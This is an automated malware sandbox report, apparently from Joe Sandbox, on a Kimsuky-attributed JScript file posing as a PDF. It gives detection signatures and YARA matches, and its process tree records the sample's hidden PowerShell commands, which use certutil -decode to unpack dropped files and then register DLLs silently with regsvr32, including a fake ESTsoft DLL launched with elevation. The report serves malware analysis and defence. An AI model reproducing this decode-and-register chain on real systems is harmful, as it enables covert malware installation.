Play interactive tour

Edit tour

Windows Analysis Report x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse

Overview

General Information

Sample Name:	x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse
Analysis ID:	1558048
MD5:	8b274243a5179028388a2c17c75afb9f
SHA1:	d5c09a6fff4dee7dee7f302c1d4d586ba6bc83f2
SHA256:	20eff877aeff0afaa8a5d29fe272bdd61e49779b9e308c4a202ad868a901a5cd
Infos:
Most interesting Screenshot:

Detection

Kimsuky

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Kimsuky

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

JavaScript source code contains functionality to generate code involving a shell, file or stream

Wscript starts Powershell (via cmd or directly)

Suspicious powershell command line found

Uses an obfuscated file name to hide its real file extension (double extension)

Uses certutil -decode

Queries the volume information (name, serial number etc) of a device

Yara signature match

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Contains capabilities to detect virtual machines

Registers a DLL

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Checks for available system drives (often done to infect USB drives)

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64_office

wscript.exe (PID: 7044 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

AcroRd32.exe (PID: 3380 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf' MD5: 84E2B28A5B7221B3AAB82CD7CA4D6619)

AcroRd32.exe (PID: 5476 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\ProgramData\ 2021-05-07.pdf' MD5: 84E2B28A5B7221B3AAB82CD7CA4D6619)

RdrCEF.exe (PID: 3972 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043 MD5: C4531F5D235167293675FF6CE5472440)

RdrCEF.exe (PID: 6412 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=83FD662E69ECF919D8944D885F919F9E --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: C4531F5D235167293675FF6CE5472440)

RdrCEF.exe (PID: 5892 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:1 MD5: C4531F5D235167293675FF6CE5472440)

RdrCEF.exe (PID: 3812 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC6E485E39BA42C7D01E94B3E9769F20 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC6E485E39BA42C7D01E94B3E9769F20 --renderer-client-id=4 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job /prefetch:1 MD5: C4531F5D235167293675FF6CE5472440)

RdrCEF.exe (PID: 5132 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=747A9B4378C4A9B7BB34D82AEF8DC480 --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: C4531F5D235167293675FF6CE5472440)

RdrCEF.exe (PID: 6260 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=4DDA8CE3F3D37EB15CD09F11D5C7C42B --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: C4531F5D235167293675FF6CE5472440)

RdrCEF.exe (PID: 2764 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=29BE366D42ABBCFC024ED1AE01B6F680 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: C4531F5D235167293675FF6CE5472440)

powershell.exe (PID: 304 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

certutil.exe (PID: 1736 cmdline: 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a MD5: EB199893441CED4BBBCB547FE411CF2D)

powershell.exe (PID: 4168 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

regsvr32.exe (PID: 5280 cmdline: 'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9a MD5: D78B75FC68247E8A63ACBA846182740E)

cmd.exe (PID: 4772 cmdline: C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1252 cmdline: C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C5CF.tmp.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

regsvr32.exe (PID: 5276 cmdline: regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' MD5: D78B75FC68247E8A63ACBA846182740E)

powershell.exe (PID: 5740 cmdline: powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

regsvr32.exe (PID: 2052 cmdline: 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 2792 cmdline: 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' MD5: D78B75FC68247E8A63ACBA846182740E)

powershell.exe (PID: 2324 cmdline: powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

regsvr32.exe (PID: 380 cmdline: 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 1328 cmdline: 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' MD5: D78B75FC68247E8A63ACBA846182740E)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x1af9e1b:$: VFZxUUFBT

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Documents\20210825\PowerShell_transcript.910646.c593w7K1.20210825105827.txt	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x14d:$a1: certutil -decode 0x32b:$a1: certutil -decode
C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x14d:$a1: certutil -decode 0x32b:$a1: certutil -decode

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.562447318.0000027E99742000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x1910:$a1: certutil -decode
00000000.00000003.536073175.0000027E9967A000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x2b0ee:$a1: certutil -decode
00000000.00000003.537403999.0000027E996A4000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x10ee:$a1: certutil -decode
00000004.00000002.445490921.0000022E1F0E2000.00000004.00000020.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x53324:$a1: certutil -decode 0x59f72:$a1: certutil -decode
00000021.00000003.657307580.0000000004F17000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xa35:$a1: certutil -decode 0xc13:$a1: certutil -decode
00000000.00000003.544459351.0000027E99732000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x11910:$a1: certutil -decode
00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp	JoeSecurity_Kimsuky	Yara detected Kimsuky	Joe Security
00000000.00000003.534562796.0000027E99708000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x3b910:$a1: certutil -decode
00000004.00000002.454006767.0000022E214AA000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x2dd18:$a1: certutil -decode 0x2ee7a:$a1: certutil -decode 0x2fa26:$a1: certutil -decode 0x307c8:$a1: certutil -decode
00000018.00000002.558431847.00007FF983D01000.00000040.00020000.sdmp	JoeSecurity_Kimsuky	Yara detected Kimsuky	Joe Security
00000004.00000002.453909044.0000022E2144F000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xf50:$a1: certutil -decode 0x2f4e:$a1: certutil -decode 0x357a:$a1: certutil -decode 0x4238:$a1: certutil -decode 0x828c:$a1: certutil -decode 0x8ae8:$a1: certutil -decode
00000000.00000003.534889418.0000027E99708000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x3b910:$a1: certutil -decode
00000000.00000003.546366739.0000027E9B3E9000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xd66:$a1: certutil -decode
00000004.00000002.445327272.0000022E1F060000.00000004.00000020.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x231c:$a1: certutil -decode 0x3520:$a1: certutil -decode
00000000.00000002.562500921.0000027E9993A000.00000004.00000040.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x1f0c:$a1: certutil -decode
00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xeb3:$a1: certutil -decode 0x2248:$a1: certutil -decode
00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x7ef:$: VFZxUUFBT 0x1b84:$: VFZxUUFBT
00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xeb3:$a1: certutil -decode 0x2248:$a1: certutil -decode
00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x7ef:$: VFZxUUFBT 0x1b84:$: VFZxUUFBT
00000000.00000003.559995374.0000027E99740000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x3910:$a1: certutil -decode
00000000.00000003.399402263.0000027E9B3C3000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xa4a:$a1: certutil -decode
00000000.00000002.562513728.0000027E9993D000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0xe2:$: VFZxUUFBT
00000000.00000003.547005043.0000027E9B3CF000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x19fde:$: VFZxUUFBT
00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x1ac0:$a1: certutil -decode
00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0xd38:$: VFZxUUFBT
00000000.00000003.547727779.0000027E9B3E1000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x7fde:$: VFZxUUFBT
00000000.00000003.534727641.0000027E99677000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x2e0ee:$a1: certutil -decode
00000000.00000003.559503063.0000027E996A5000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xee:$a1: certutil -decode
00000000.00000003.551541440.0000027E9CD90000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0xb0:$: VFZxUUFBT
00000000.00000003.559948938.0000027EB69DF000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x350:$a1: certutil -decode
00000000.00000003.559831762.0000027E996A5000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xee:$a1: certutil -decode
00000000.00000003.539482612.0000027E99715000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x2e910:$a1: certutil -decode
00000000.00000002.569744930.0000027E9B3E2000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x6fde:$: VFZxUUFBT
00000000.00000003.534340935.0000027E9CCC6000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x1e6e:$a1: certutil -decode
00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xeb3:$a1: certutil -decode 0x2248:$a1: certutil -decode
00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x7ef:$: VFZxUUFBT 0x1b84:$: VFZxUUFBT
00000000.00000003.546419483.0000027E9B3C6000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x22fde:$: VFZxUUFBT
00000000.00000003.549235895.0000027E99939000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x2f0c:$a1: certutil -decode
00000000.00000003.540876716.0000027E9972A000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x19910:$a1: certutil -decode
00000000.00000002.570828518.0000027E9CC69000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x358:$a1: certutil -decode 0xe98:$a1: certutil -decode 0x1258:$a1: certutil -decode 0x19d8:$a1: certutil -decode
0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp	JoeSecurity_Kimsuky	Yara detected Kimsuky	Joe Security
00000004.00000002.453777516.0000022E213DE000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x6dc0:$a1: certutil -decode 0x7882:$a1: certutil -decode 0x82b0:$a1: certutil -decode 0x8b52:$a1: certutil -decode 0xc142:$a1: certutil -decode 0xd2a4:$a1: certutil -decode 0xd83e:$a1: certutil -decode
00000000.00000002.571040593.0000027E9CCC6000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x1e6e:$a1: certutil -decode
00000000.00000003.547572927.0000027E9993C000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x10e2:$: VFZxUUFBT
00000004.00000002.452214006.0000022E20FF2000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x439dc:$a1: certutil -decode
Process Memory Space: wscript.exe PID: 7044	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x5825b1:$: VFZxUUFBT 0x585112:$: VFZxUUFBT 0x62484c:$: VFZxUUFBT
Process Memory Space: powershell.exe PID: 304	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0xc21a8:$sa2: -encodedCommand 0xc21d4:$sa2: -encodedCommand 0xc28c0:$sa2: -EncodedCommand 0xc33d8:$sa2: -EncodedCommand 0xc3473:$sa2: -encodedCommand 0xc3540:$sa2: -encodedCommand 0xaecc:$sb3: -windowstyle hidden 0x443b2:$sb3: -windowstyle hidden 0x6e3ab:$sb3: -windowstyle hidden 0x6ee33:$sb3: -windowstyle hidden 0xb4aec:$sb3: -windowstyle hidden 0xb4d46:$sb3: -windowstyle hidden 0xb4df5:$sb3: -windowstyle hidden 0x174736:$sb3: -windowstyle hidden 0x178881:$sb3: -windowstyle hidden 0x1789ce:$sb3: -windowstyle hidden 0xc269b:$sc2: -NoProfile 0xc26dc:$sd2: -NonInteractive
Process Memory Space: powershell.exe PID: 304	PowerShell_Susp_Parameter_Combo_RID336F	Detects PowerShell invocation with suspicious parameters	Florian Roth	0xc21a8:$sa2: -encodedCommand 0xc21d4:$sa2: -encodedCommand 0xc28c0:$sa2: -EncodedCommand 0xc33d8:$sa2: -EncodedCommand 0xc3473:$sa2: -encodedCommand 0xc3540:$sa2: -encodedCommand 0xaecc:$sb3: -windowstyle hidden 0x443b2:$sb3: -windowstyle hidden 0x6e3ab:$sb3: -windowstyle hidden 0x6ee33:$sb3: -windowstyle hidden 0xb4aec:$sb3: -windowstyle hidden 0xb4d46:$sb3: -windowstyle hidden 0xb4df5:$sb3: -windowstyle hidden 0x174736:$sb3: -windowstyle hidden 0x178881:$sb3: -windowstyle hidden 0x1789ce:$sb3: -windowstyle hidden 0xc269b:$sc2: -NoProfile 0xc26dc:$sd2: -NonInteractive
Process Memory Space: powershell.exe PID: 4168	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x136099:$sa2: -encodedCommand 0x1360c5:$sa2: -encodedCommand 0x1367b1:$sa2: -EncodedCommand 0x1372c9:$sa2: -EncodedCommand 0x137364:$sa2: -encodedCommand 0x137431:$sa2: -encodedCommand 0x2e301:$sb3: -windowstyle hidden 0x2e8d2:$sb3: -windowstyle hidden 0x2eae8:$sb3: -windowstyle hidden 0x2f67a:$sb3: -windowstyle hidden 0x64d0e:$sb3: -windowstyle hidden 0x64ee5:$sb3: -windowstyle hidden 0xad4ac:$sb3: -windowstyle hidden 0xc383e:$sb3: -windowstyle hidden 0x118f10:$sb3: -windowstyle hidden 0x119008:$sb3: -windowstyle hidden 0x13658c:$sc2: -NoProfile 0x1365cd:$sd2: -NonInteractive
Process Memory Space: powershell.exe PID: 4168	PowerShell_Susp_Parameter_Combo_RID336F	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x136099:$sa2: -encodedCommand 0x1360c5:$sa2: -encodedCommand 0x1367b1:$sa2: -EncodedCommand 0x1372c9:$sa2: -EncodedCommand 0x137364:$sa2: -encodedCommand 0x137431:$sa2: -encodedCommand 0x2e301:$sb3: -windowstyle hidden 0x2e8d2:$sb3: -windowstyle hidden 0x2eae8:$sb3: -windowstyle hidden 0x2f67a:$sb3: -windowstyle hidden 0x64d0e:$sb3: -windowstyle hidden 0x64ee5:$sb3: -windowstyle hidden 0xad4ac:$sb3: -windowstyle hidden 0xc383e:$sb3: -windowstyle hidden 0x118f10:$sb3: -windowstyle hidden 0x119008:$sb3: -windowstyle hidden 0x13658c:$sc2: -NoProfile 0x1365cd:$sd2: -NonInteractive
